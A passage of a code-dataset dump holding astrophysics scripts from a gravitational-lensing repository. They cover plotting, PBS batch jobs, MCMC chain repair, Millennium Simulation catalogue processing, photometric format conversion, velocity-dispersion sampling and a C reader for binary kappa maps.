color='b')\n\n#ax.set_ylim([0.00,0.05])\nax.set_ylim([-0.02,0.08])\nax.set_ylabel('median$_\\kappa$')\n#ax.set_ylabel('$\\mathrm{median}_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + 2*width)\nax.set_xticklabels(labels, fontsize=6, rotation='vertical')\n\nax = plt.subplot(2,1,2)\n\ncol2 = (kappastat[1])\nrects2 = ax.bar(ind + 2*width, col2, width, color='b')\n\nax.set_ylim([0,0.08])\nax.set_ylabel('$\\sigma_\\kappa$')\n#ax.set_ylabel('$\\sigma_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + 2*width)\nax.set_xticklabels([])\n#ax.legend((rects1[0], rects2[0]), ('22.5 45: gal+1/r 120: gal+$\\gamma$+', '22.5 45: gal+1/r 120: gal+1/r+$\\gamma$+'), bbox_to_anchor=(0.65, 1.4), fontsize=10)\n#ax.legend((rects1[0], rects2[0]), ('45 22.5 gal+1/r+$\\gamma$+', '120 22.5 gal+1/r+$\\gamma$+'), bbox_to_anchor=(0.3, 0.97), fontsize=10)\nplt.subplots_adjust(left=0.15, bottom=0.02, right=0.95, top=0.95, wspace=0.7, hspace=1.2)\nplt.savefig('%skappashistbar-others.png' % root, dpi=250)\n\nplt.clf()\n" }, { "alpha_fraction": 0.634782612323761, "alphanum_fraction": 0.7188405990600586, "avg_line_length": 19.352941513061523, "blob_id": "cddb90ce41ce4d3bf1b61d38d8c6e47aa939133c", "content_id": "383ca7cce79f51c2655cecfbd8c9b047b9eaeec3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 345, 
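The medstd.dat handling in plotkappabar_others.py above transposes a mixed string/float structured array and masks on the name column for every lookup. An equivalent, arguably clearer pattern (a sketch, not the script's code) builds a dictionary keyed by file name once:

import numpy as np

def load_stats(path):
    # same mixed dtype as the script's genfromtxt call
    rows = np.genfromtxt(path, dtype=['S1000', 'f8', 'f8', 'f8', 'f8'])
    return {row[0]: np.array([row[1], row[2], row[3], row[4]]) for row in rows}

# each constraint combination is then stats[name] instead of a masked transpose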
"license_type": "no_license", "max_line_length": 124, "num_lines": 17, "path": "/python/scripts/NAOJ/batch_infersim6new.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n##PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Log6.out\n#PBS -e Log6.err\n#PBS -N 6\n#PBS -l mem=30gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython inferkappa_unbiasedwithshearJ1206withHE0435.py J1206 -1.0 -1.0 removegrouphandpicked fiducial 5 45 24 meds gal zoverr" }, { "alpha_fraction": 0.6275468468666077, "alphanum_fraction": 0.634881854057312, "avg_line_length": 29.461538314819336, "blob_id": "1b2bfbc9c1fde97c883276bfc4b397d311c1e160", "content_id": "eed6d720f6496852abbe5a23797b30b6550f6051", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1227, "license_type": "no_license", "max_line_length": 142, "num_lines": 39, "path": "/python/modeling_utilities/rejected.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code fixes the MCMC chains from Hostlens/Glafic by accounting for the trace of the rejected points. It needs two inputs:\r\n# - the mcmc file exported by hostlens/glafic\r\n# - a copy of the execution screen which displays the mcmc reject/accepted points; edit it to remove the unnecessary lines (header and footer)\r\n\r\nimport sys\r\nimport os\r\nimport numpy as np\r\nimport corner\r\n\r\nprefix = \"ilens_out_mcmc\"\r\nfilescreen = prefix + \"screen.dat\"\r\nfilemcmc = prefix + \".dat\"\r\nfileout = prefix + \"withrejected.dat\"\r\n\r\nwith open(filescreen, 'r') as f:\r\n screen = f.readlines()\r\n f.close()\r\n\r\nwith open(filemcmc, 'r') as f:\r\n mcmc = f.readlines()\r\n f.close()\r\n\r\nout = [] # will contain the complete chains\r\ni = 0 # index in mcmc file\r\ninit = 0 # whether or not it found the first successful point\r\nfor j in range(np.shape(screen)[0]): # index in screen file\r\n if init == 1 and \"[rejected]\" in screen[j]:\r\n out.append(mcmc[i])\r\n if init == 1 and \"[rejected]\" not in screen[j]:\r\n i += 1\r\n out.append(mcmc[i])\r\n if init == 0 and \"[rejected]\" not in screen[j]:\r\n init = 1\r\n out.append(mcmc[i])\r\n i += 1\r\n\r\nwith open(fileout, 'w') as f:\r\n f.writelines(out)\r\n f.close()\r\n" }, { "alpha_fraction": 0.5312056541442871, "alphanum_fraction": 0.5794326066970825, "avg_line_length": 46, "blob_id": "04a428955b68ca04ae1807a0e584dff3a88ef70d", "content_id": "431bb1587b9404cb030e8fc28f44dcc39c02ff5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1410, "license_type": "no_license", "max_line_length": 132, "num_lines": 30, "path": "/python/catalogue_utilities/extractMilleniumPG1115.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# This code samples from a single-band the Millenium Simulation (MS) photometry\n\nimport numpy as np\n\nrootin = \"/Volumes/LaCieDavis/lensing_simulations/SA_galaxies/original/original/\"\nrootout = \"/Volumes/LaCieDavis/lensing_simulations/SA_galaxies/original/PG1115/\"\n\nid = 0\nzspec = 5\nposx = 6\nposy = 7\nr = 14\n\nrRstd = 0.07\nhead = \"GalID \\t z_spec \\t pos_0 \\t pos_1 \\t mag_SDSS_r\"\nfor i in range(8):\n for j in range(8):\n for k in range(4):\n for l in range(4):\n print i,j,k,l\n filein = rootin+'GGL_los_8_%s_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63.images.txt' %(i,j,k,l)\n fileout = 
rootout+'GGL_los_8_%s_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_originalr.images.txt' %(i,j,k,l)\n data = np.loadtxt(filein,usecols=[id,zspec,posx,posy,r],comments='GalID')\n data = data[data[:,4]<=24]\n np.savetxt(fileout,data,header=head,fmt='%d \\t %.3f \\t %.7f \\t %.7f \\t %.2f')\n fileout = rootout+'GGL_los_8_%s_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_sampledr.images.txt' %(i,j,k,l)\n data = np.loadtxt(filein,usecols=[id,zspec,posx,posy,r],comments='GalID')\n data[:,4] = np.random.normal(data[:,4], 0.07)\n data = data[data[:,4]<=24]\n np.savetxt(fileout,data,header=head,fmt='%d \\t %.3f \\t %.7f \\t %.7f \\t %.2f')\n" }, { "alpha_fraction": 0.5477481484413147, "alphanum_fraction": 0.6311509609222412, "avg_line_length": 35.060150146484375, "blob_id": "be37ca28a9cb9d162dfbf6464dfbaaa0431d4eba", "content_id": "cf25c2b2c8fba17e67a9fd8a83b7e90532a2a12d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4796, "license_type": "no_license", "max_line_length": 274, "num_lines": 133, "path": "/python/catalogue_utilities/finalprepMilleniumNAOJ_griK.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# This code uses the output from MstarMilleniumSLAC_WFI2033.py, photozMillenium_WFI2033.py and extractMillenium.py in order to prepare a final file from the Millennium Simulation to send to the NAOJ server. It also computes halo masses following Behroozi et al 2010\n# Run as python finalprepMilleniumNAOJ_griK.py GGL_los_8_4_6_2_1_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_ugrizJHK_WFI2033.images.txt\n\nimport numpy as np\nimport sys\n\nfileextract = str(sys.argv[1])\n\n#fileextract = \"GGL_los_8_4_6_2_1_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_ugrizJHK_WFI2033.images.txt\"\n#fileforlephare = \"GGL_los_8_1_2_3_2_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_griK_WFI2033.images_forlephare.txt\"\n#filemstar = \"GGL_los_8_4_5_3_0_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_griK_WFI2033.images_forlephare_mstar.txt\"\nfileforlephare = fileextract[:-27] + \"griK_WFI2033.images_forlephare.txt\"\nfilemstar = fileextract[:-27] + \"griK_WFI2033.images_forlephare_mstar.txt\"\nfileout = fileextract[:-27] + \"griK_WFI2033.images_forNAOJ.txt\"\n\nid = 0\nzspec = 1\nposx = 2\nposy = 3\nmhalo = 4\nmstar = 5\niorig = 6\ni_o = 13\n\nphotoz = 18\nmstar_specz = 1\nmstar_photoz = 2\ndataextract = np.loadtxt(fileextract,usecols=[id,zspec,posx,posy,mhalo,mstar,iorig,i_o],unpack=True)\ndataforlephare = np.loadtxt(fileforlephare,usecols=[photoz],unpack=True)\ndatamstar = np.loadtxt(filemstar,usecols=[mstar_specz,mstar_photoz],unpack=True)\n\nid = 0\nzspec = 1\nposx = 2\nposy = 3\nmhalo = 4\nmstar = 5\niorig = 6\ni_o = 7\nmstar_specz = 0\nmstar_photoz = 1\n\n# Behroozi et al 2010 parameters for z < 1:\nM10_ = 12.35\nM1a_ = 0.28\nMs00_ = 10.72\nMs0a_ = 0.55\nb0_ = 0.44\nba_ = 0.18\nd0_ = 0.57\nda_ = 0.17\ng0_ = 1.56\nga_ = 2.51\n# z >= 1:\nM10 = 12.27\nM1a = -0.84\nMs00 = 11.09\nMs0a = 0.56\nb0 = 0.65\nba = 0.31\nd0 = 0.56\nda = -0.12\ng0 = 1.12\nga = -0.53\n\ndatahalo = np.zeros([len(dataextract[id]),2])\n\nif \"JHK\" in fileextract:\n a = 1 / (1 + dataextract[zspec][dataextract[zspec] <= 1])\n logM1a = M10_ + M1a_ * (a - 1)\n logMs0a = Ms00_ + Ms0a_ * (a - 1)\n notlogMs0a = 10 ** logMs0a\n b = b0_ + ba_ * (a - 1)\n d = d0_ + da_ * (a - 1)\n g = g0_ + ga_ * (a - 1)\n datahalo[:,0][dataextract[zspec] <= 1] = logM1a + b * (datamstar[mstar_specz][dataextract[zspec] <= 1] - logMs0a) + ((10 ** 
datamstar[mstar_specz][dataextract[zspec] <= 1]/notlogMs0a)**d)/(1+(10 ** datamstar[mstar_specz][dataextract[zspec] <= 1]/notlogMs0a)**(-g)) - 1/2\n del logM1a\n del logMs0a\n del notlogMs0a\n del b\n del d\n del g\n\n a = 1 / (1 + dataextract[zspec][dataextract[zspec] > 1])\n logM1a = M10 + M1a * (a-1)\n logMs0a = Ms00 + Ms0a * (a-1)\n notlogMs0a = 10 ** logMs0a\n b = b0 + ba * (a-1)\n d = d0 + da * (a-1)\n g = g0 + ga * (a-1)\n datahalo[:,0][dataextract[zspec] > 1] = logM1a + b * (datamstar[mstar_specz][dataextract[zspec] > 1] - logMs0a) + ((10 ** datamstar[mstar_specz][dataextract[zspec] > 1]/notlogMs0a)**d)/(1+(10 ** datamstar[mstar_specz][dataextract[zspec] > 1]/notlogMs0a)**(-g)) - 1/2\n del logM1a\n del logMs0a\n del notlogMs0a\n del b\n del d\n del g\n\n a = 1 / (1 + dataforlephare[dataforlephare <= 1])\n logM1a = M10_ + M1a_ * (a - 1)\n logMs0a = Ms00_ + Ms0a_ * (a - 1)\n notlogMs0a = 10 ** logMs0a\n b = b0_ + ba_ * (a - 1)\n d = d0_ + da_ * (a - 1)\n g = g0_ + ga_ * (a - 1)\n datahalo[:,1][dataforlephare <= 1] = logM1a + b * (datamstar[mstar_photoz][dataforlephare <= 1] - logMs0a) + ((10 ** datamstar[mstar_photoz][dataforlephare <= 1]/notlogMs0a)**d)/(1+(10 ** datamstar[mstar_photoz][dataforlephare <= 1]/notlogMs0a)**(-g)) - 1/2\n del logM1a\n del logMs0a\n del notlogMs0a\n del b\n del d\n del g\n \n a = 1 / (1 + dataforlephare[dataforlephare > 1])\n logM1a = M10 + M1a * (a-1)\n logMs0a = Ms00 + Ms0a * (a-1)\n notlogMs0a = 10 ** logMs0a\n b = b0 + ba * (a-1)\n d = d0 + da * (a-1)\n g = g0 + ga * (a-1)\n datahalo[:,1][dataforlephare > 1] = logM1a + b * (datamstar[mstar_photoz][dataforlephare > 1] - logMs0a) + ((10 ** datamstar[mstar_photoz][dataforlephare > 1]/notlogMs0a)**d)/(1+(10 ** datamstar[mstar_photoz][dataforlephare > 1]/notlogMs0a)**(-g)) - 1/2\n del logM1a\n del logMs0a\n del notlogMs0a\n del b\n del d\n del g\n\ndataout = np.c_[dataextract[id],dataextract[zspec],dataextract[posx],dataextract[posy],dataextract[mhalo],dataextract[mstar],dataextract[iorig],dataextract[i_o],dataforlephare,datamstar[mstar_specz],datamstar[mstar_photoz],datahalo[:,0],datahalo[:,1]]\nhead = \"GalID \\t z_spec \\t pos_0 \\t pos_1 \\t M_Halo \\t M_Stellar \\t mag_SDSS_iorig \\t mag_SDSS_i \\t photoz \\t mstar_specz \\t mstar_photoz \\t mhalo_specz \\t mhalo_photoz\"\nnp.savetxt(fileout,dataout,header=head,fmt='%d \\t %.3f \\t %.7f \\t %.7f \\t %.3e \\t %.3e \\t %.2f \\t %.2f \\t %.2f \\t %.3f \\t %.3f \\t %.3f \\t %.3f')\n\nprint str(sys.argv[1]) + ' Done!'\n" }, { "alpha_fraction": 0.4378458857536316, "alphanum_fraction": 0.545976996421814, "avg_line_length": 49.51612854003906, "blob_id": "23eb5e68a30caa72311b525fc7be3cd6297b2af0", "content_id": "19df5ec6b134b9b6184e7c573f7b6c8fb7dd0a01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4698, "license_type": "no_license", "max_line_length": 229, "num_lines": 93, "path": "/python/catalogue_utilities/converttoeazy.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# The code is used to convert a photometric catalogue in the format expected by BPZ to the format expected by EaZy. 
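The four near-identical blocks in finalprepMilleniumNAOJ_griK.py above evaluate the Behroozi et al. (2010) stellar-to-halo mass relation, log Mh = log M1(a) + beta(a) [log M* - log M*,0(a)] + (M*/M*,0)^delta / (1 + (M*/M*,0)^-gamma) - 1/2, with scale factor a = 1/(1+z) and separate parameter sets for z <= 1 and z > 1. A single-function sketch using the script's own parameter values; note that the script's literal `- 1/2` evaluates to zero under Python 2 integer division (this is Python 2 code, given its print statements), so the constant -1/2 term is silently dropped there; it is written as -0.5 below.

import numpy as np

# parameter values copied from the script above
BEHROOZI_LOWZ  = dict(M10=12.35, M1a=0.28,  Ms00=10.72, Ms0a=0.55,
                      b0=0.44, ba=0.18, d0=0.57, da=0.17, g0=1.56, ga=2.51)   # z <= 1
BEHROOZI_HIGHZ = dict(M10=12.27, M1a=-0.84, Ms00=11.09, Ms0a=0.56,
                      b0=0.65, ba=0.31, d0=0.56, da=-0.12, g0=1.12, ga=-0.53) # z > 1

def log_mhalo(logmstar, z):
    # logmstar is log10(M*/Msun); returns log10(Mhalo/Msun)
    p = BEHROOZI_LOWZ if z <= 1 else BEHROOZI_HIGHZ
    a = 1.0 / (1.0 + z)
    logM1  = p['M10']  + p['M1a']  * (a - 1)
    logMs0 = p['Ms00'] + p['Ms0a'] * (a - 1)
    b = p['b0'] + p['ba'] * (a - 1)
    d = p['d0'] + p['da'] * (a - 1)
    g = p['g0'] + p['ga'] * (a - 1)
    ratio = 10 ** (logmstar - logMs0)
    return logM1 + b * (logmstar - logMs0) + ratio**d / (1 + ratio**(-g)) - 0.5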
The code handles non-detections (not yet non-exposures).\n##########################\n\nimport numpy as np\nimport sys\n\nfile = str(sys.argv[1])\n#file = \"rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpz.cat\"\n#file = \"i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpz.cat\"\n\n# zeropoint corrections suggested by BPZ:\nif 'detectin_iunconv' in file:\n g_corr = -0.077\n r_corr = -0.004\n i_corr = 0.000\n K_corr = -0.022\nif 'detectin_iconv' in file:\n g_corr = -0.061\n r_corr = -0.007\n i_corr = 0.000\n K_corr = -0.046\n\n# conversion from Vega to AB; assuming that the input mags are in Vega\nK_corr += 1.83\n\nif 'detectin_iunconv' in file:\n id = 0\n g = 22\n g_err = 23\n r = 24\n r_err = 25\n i = 26\n i_err = 27\n K = 28\n K_err = 29\nif 'detectin_iconv' in file:\n id = 0\n g = 20\n g_err = 21\n r = 22\n r_err = 23\n i = 24\n i_err = 25\n K = 26\n K_err = 27\n\ndata = np.loadtxt(file,unpack=True)\n\n# apply the corrections\ndata[g][np.abs(data[g]) != 99.0] += g_corr\ndata[r][np.abs(data[r]) != 99.0] += r_corr\ndata[i][np.abs(data[i]) != 99.0] += i_corr\ndata[K][np.abs(data[K]) != 99.0] += K_corr\n\n# make non-detection fluxes -99\ndata[g][np.abs(data[g]) == 99.0] = -99\ndata[r][np.abs(data[r]) == 99.0] = -99\ndata[i][np.abs(data[i]) == 99.0] = -99\ndata[K][np.abs(data[K]) == 99.0] = -99\n\n# for the non-detections, replace error bars with the flux corresponsing to the corrected limiting mag\ndata[g_err][np.abs(data[g]) == 99.0] = 3631000000 * 10**(-(data[g_err][np.abs(data[g]) == 99.0] + g_corr)/2.5)\ndata[r_err][np.abs(data[r]) == 99.0] = 3631000000 * 10**(-(data[r_err][np.abs(data[r]) == 99.0] + r_corr)/2.5)\ndata[i_err][np.abs(data[i]) == 99.0] = 3631000000 * 10**(-(data[i_err][np.abs(data[i]) == 99.0] + i_corr)/2.5)\ndata[K_err][np.abs(data[K]) == 99.0] = 3631000000 * 10**(-(data[K_err][np.abs(data[K]) == 99.0] + K_corr)/2.5)\n\n# make minimum delta mag 0.01\ndata[g_err][(np.abs(data[g]) != 99.0) & (np.abs(data[g_err]) == 0.00)] = 0.01\ndata[r_err][(np.abs(data[r]) != 99.0) & (np.abs(data[r_err]) == 0.00)] = 0.01\ndata[i_err][(np.abs(data[i]) != 99.0) & (np.abs(data[i_err]) == 0.00)] = 0.01\ndata[K_err][(np.abs(data[K]) != 99.0) & (np.abs(data[K_err]) == 0.00)] = 0.01\n\n# a small number of objects in BPZ have good mags, but error on the mag 99; those objects should be good, and Ideally I would fix the errors one by one through closer examination. 
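# -- Illustrative aside: the conversion applied a few lines below rests on the
#    AB zero point, 3631 Jy = 3.631e9 microJansky, so flux = 3631000000 *
#    10**(-m/2.5) in microJansky, and the flux error is symmetrized from the
#    +/- magnitude error. A standalone sketch of just that conversion:

def ab_to_ujy(mag):
    # AB magnitude to flux in microJansky
    return 3631000000.0 * 10 ** (-mag / 2.5)

def ab_err_to_ujy(mag, mag_err):
    # half the flux spread spanned by mag - mag_err and mag + mag_err
    return (ab_to_ujy(mag - mag_err) - ab_to_ujy(mag + mag_err)) / 2.0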
Here I just replace their errors with 1 mag\ndata[g_err][np.abs(data[g_err]) == 99.00] = 1.00\ndata[r_err][np.abs(data[r_err]) == 99.00] = 1.00\ndata[i_err][np.abs(data[i_err]) == 99.00] = 1.00\ndata[K_err][np.abs(data[K_err]) == 99.00] = 1.00\n\n# convert AB -> Jky\ndata[g_err][np.abs(data[g]) != 99.0] = 3631000000 * (10**(-(data[g][np.abs(data[g]) != 99.0] - data[g_err][np.abs(data[g]) != 99.0])/2.5) - 10**(-(data[g][np.abs(data[g]) != 99.0] + data[g_err][np.abs(data[g]) != 99.0])/2.5)) / 2\ndata[g][np.abs(data[g]) != 99.0] = 3631000000 * 10**(-data[g][np.abs(data[g]) != 99.0]/2.5)\ndata[r_err][np.abs(data[r]) != 99.0] = 3631000000 * (10**(-(data[r][np.abs(data[r]) != 99.0] - data[r_err][np.abs(data[r]) != 99.0])/2.5) - 10**(-(data[r][np.abs(data[r]) != 99.0] + data[r_err][np.abs(data[r]) != 99.0])/2.5)) / 2\ndata[r][np.abs(data[r]) != 99.0] = 3631000000 * 10**(-data[r][np.abs(data[r]) != 99.0]/2.5)\ndata[i_err][np.abs(data[i]) != 99.0] = 3631000000 * (10**(-(data[i][np.abs(data[i]) != 99.0] - data[i_err][np.abs(data[i]) != 99.0])/2.5) - 10**(-(data[i][np.abs(data[i]) != 99.0] + data[i_err][np.abs(data[i]) != 99.0])/2.5)) / 2\ndata[i][np.abs(data[i]) != 99.0] = 3631000000 * 10**(-data[i][np.abs(data[i]) != 99.0]/2.5)\ndata[K_err][np.abs(data[K]) != 99.0] = 3631000000 * (10**(-(data[K][np.abs(data[K]) != 99.0] - data[K_err][np.abs(data[K]) != 99.0])/2.5) - 10**(-(data[K][np.abs(data[K]) != 99.0] + data[K_err][np.abs(data[K]) != 99.0])/2.5)) / 2\ndata[K][np.abs(data[K]) != 99.0] = 3631000000 * 10**(-data[K][np.abs(data[K]) != 99.0]/2.5)\n \nfileout = file[:-12] + \"_forEazy.cat\"\nstr = \"id F323 E323 F324 E324 F325 E325 F326 E326\"\ndataout = np.c_[data[id],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[K],data[K_err]]\nnp.savetxt(fileout,dataout,header=str,fmt='%d \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f')\n" }, { "alpha_fraction": 0.6697080135345459, "alphanum_fraction": 0.7682482004165649, "avg_line_length": 26.399999618530273, "blob_id": "ddc47f8e86dbf800e0e905b7db851e3a47665de1", "content_id": "1736251bfe327e11daf1c08251927a3a940b6f38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 548, "license_type": "no_license", "max_line_length": 78, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim6.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log6s.out\n#PBS -e Log6s.err\n#PBS -N 6s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal gamma oneoverr mass2\npython inferkappasimbias.py WFI2033 5 120 23 meds gal gamma oneoverr mass2\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal gamma oneoverr mass2\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal gamma oneoverr mass2\n" }, { "alpha_fraction": 0.5899524688720703, "alphanum_fraction": 0.6157501935958862, "avg_line_length": 31.44444465637207, "blob_id": "bb042652a782f225120ad2c9f9b44d9f15f438aa", "content_id": "32cbff1b1d8b26e961a2f4a1fdecbbda53be0a92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1473, "license_type": "no_license", "max_line_length": 130, "num_lines": 45, "path": "/python/modeling_utilities/varyoneoutput.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": 
"# Given a out_optresult.dat file output fom glafic varyone, run glafic in order to plot the variation of the corresponding images.\r\n\r\nimport sys\r\nimport os\r\nimport numpy as np\r\nimport corner\r\n\r\nfilein = str(sys.argv[1]) # glafic input file\nfileout = str(sys.argv[2]) # out_optresult.dat file\nwith open(fileout, 'r') as f:\n out = f.readlines()\n\nlistlens = np.array([])\nlist = np.array([])\ni = 1\nindex = 12 # first line containing the lens parameters in the file\n\n################# this is in case I'm looking for lens properties:\nwhile index + 2 < len(out):\n listlens = np.append(listlens,float(out[index-1].split()[2]))\n index += 16 # the number of lines until the next lens parameters\nprint listlens\n\n################# this is only in case I'm looking for image properties:\nwhile index < 0:\n#while index + 2 < len(out):\n with open(filein, 'r') as f:\n glafic = f.readlines()\n glafic[10 - 1] = \"prefix out%s\" % str(i) + \"\\n\"\n glafic[29 - 1] = out[index-1]\n glafic[30 - 1] = out[index]\n glafic[31 - 1] = out[index+1]\n glafic[32 - 1] = out[index+2]\n glafic[51 - 1] = \"findimg\" + \"\\n\"\n with open(filein, 'w') as f:\n f.writelines(glafic)\n #f.close()\r\n os.system(\"glafic %s\" % filein)\n data = np.loadtxt(\"out%s_point.dat\" % str(i))\n list = np.append(list,data[4][3])\n os.system(\"rm out%s_point.dat\" % str(i))\n index += 16 # the number of lines until the next lens parameters\n i += 1\n\nprint list\r\n\r\n\r\n" }, { "alpha_fraction": 0.526125431060791, "alphanum_fraction": 0.618971049785614, "avg_line_length": 53.08695602416992, "blob_id": "827d6cd89d56141421c74ea29870b81f482f3f4b", "content_id": "fbfc68a381540beade6f68619047bf5e78621e04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2488, "license_type": "no_license", "max_line_length": 555, "num_lines": 46, "path": "/python/catalogue_utilities/veldispsamplesfromMstar.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Calculates the pdf for the velocity dispersion of each galaxy. Check Jabran Zahid et al 2016 for the applicability of the formulas. The input is a file that contains 100 (z,Mstar) pairs for each galaxy, on each line, and is produced by mstarsampling_nobeta_forveldisperr.py\n\nimport numpy as np\nimport scipy\nfrom scipy import stats\nimport sys\nimport os\nfrom os import system\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\n\n####################\n# Jabran Zahid et al 2017 parameters:\nsb = 10**(2.07)\nMb = 10**(10.26)\na1 = 0.403\na2 = 0.293\n#veldisperr = lambda x: 0.001*(0.1 * x + 14) # [km/s]; eyeballed from Fig. 9(a)\nveldisperr = lambda x: 0.1 * x + 14 # [km/s]; eyeballed from Fig. 
9(a)\n\n####################\nlens = SkyCoord('20:33:42.16 -47:23:44.20', frame='fk5', unit=(u.hourangle, u.deg)) # center of the lensing galaxy\n\n# read from file\nra = 2\ndec = 3\nimag = 4\nclassify = 7\nz0 = 8\nmstar0 = 9\n\nfile = \"rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W_forveldisperr.cat\"\ndata = np.loadtxt(file)\ndata = data[(data[:,imag]<=23) & (data[:,classify]>=0)] # only i <= 23 galaxies\nveldisp = np.zeros([np.shape(data)[0],100])\n\nfor i in range(np.shape(data)[0]):\n mstar = data[i][mstar0:208:2]\n #mstar = mstar - np.log10(0.55) # not converting to Salpeter IMF, because both I and Zahid et al 2016 calculated masses with Chabrier\n coord = SkyCoord(ra=data[i][ra]*u.degree, dec=data[i][dec]*u.degree, frame='fk5')\n sep = coord.separation(lens).arcsec\n z = data[i][z0:207:2] # in the current code, it is not used for anything\n veldisp[i][10**mstar < Mb] = np.abs(np.random.normal(sb * ((10**mstar[10**mstar < Mb] / Mb)**a1),veldisperr((10**mstar[10**mstar < Mb] / Mb)**a1)))\n veldisp[i][10**mstar >= Mb] = np.abs(np.random.normal(sb * ((10**mstar[10**mstar >= Mb] / Mb)**a2),veldisperr((10**mstar[10**mstar >= Mb] / Mb)**a2)))\n\nnp.savetxt(file[:-4] + \"_veldisppdf.cat\",veldisp,fmt=' '.join(['%.2f']*100)) # one %.2f per sample column\n" }, { "alpha_fraction": 0.5153429508209229, "alphanum_fraction": 0.5622743964195251, "avg_line_length": 21.08333396911621, "blob_id": "0b9d03e0b68669287173520992e14b64bf83cc01", "content_id": "ba22b94ad213b331289d4500467a470896e795bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1108, "license_type": "no_license", "max_line_length": 110, "num_lines": 48, "path": "/python/catalogue_utilities/readKappaBinary.c", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\nint main (int argc, char** argv) {\r\n \r\n FILE *fpt;\r\n float* kappa;\r\n \r\n const size_t number_of_elements = 4096 * 4096;\r\n const size_t size_of_elements = sizeof(float);\r\n const char kappa_file_name[] = \"kappa_maps_z_1.3857/GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_37_f.kappa\";\r\n \r\n kappa = calloc(number_of_elements, size_of_elements);\r\n \r\n if (!kappa)\r\n {\r\n fprintf(stderr, \"Cannot allocate memory for kappa array\\n\");\r\n exit(-1);\r\n }\r\n\r\n //fprintf(stdout, \"%s\\n\", kappa_file_name);\r\n\t \r\n fpt = fopen (kappa_file_name, \"r\");\r\n \r\n if (!fpt)\r\n {\r\n fprintf(stderr, \"Cannot open kappa file\\n\");\r\n exit(-1);\r\n }\r\n\t \r\n fread(kappa, size_of_elements, number_of_elements, fpt);\r\n fclose (fpt);\r\n\r\n\r\n fpt = fopen (\"kappa_values.dat\", \"w\");\r\n int i;\r\n for (i=0; i<number_of_elements; i++)\r\n {\r\n fprintf(fpt, \"%d\\t%lf\\n\", i, kappa[i]);\r\n }\r\n fclose(fpt);\r\n\r\n fprintf(stdout, \"test kappa value:\\n %f %f %f\\n\", kappa[0], kappa[1000+2000*4096], kappa[4095+4095*4096]);\r\n\r\n free(kappa);\r\n return 0;\r\n \r\n}\r\n" } ]
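A note on the broken power law sampled in veldispsamplesfromMstar.py above (with the parenthesis fix applied to the high-mass branch): below Mb the draw is centred on sb*(M*/Mb)**a1, above Mb on sb*(M*/Mb)**a2, and the eyeballed error model is evaluated at the same power in both branches. A minimal single-galaxy sketch under those assumptions — draw_veldisp and the example mass are illustrative, not part of the repo:

import numpy as np

SB, MB, A1, A2 = 10**2.07, 10**10.26, 0.403, 0.293   # Zahid et al. parameters from the script above
veldisperr = lambda x: 0.1 * x + 14                  # [km/s], same eyeballed error model

def draw_veldisp(log_mstar, rng=None):
    # Draw one velocity dispersion [km/s] for a galaxy of given log10 stellar mass.
    rng = rng or np.random.default_rng()
    ratio = 10**log_mstar / MB
    a = A1 if 10**log_mstar < MB else A2   # pick the low- or high-mass branch
    mean = SB * ratio**a                   # sigma_b * (M*/Mb)**a
    return abs(rng.normal(mean, veldisperr(ratio**a)))

print(draw_veldisp(10.8))   # ~170 +/- 14 km/s for a 10**10.8 Msun galaxy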
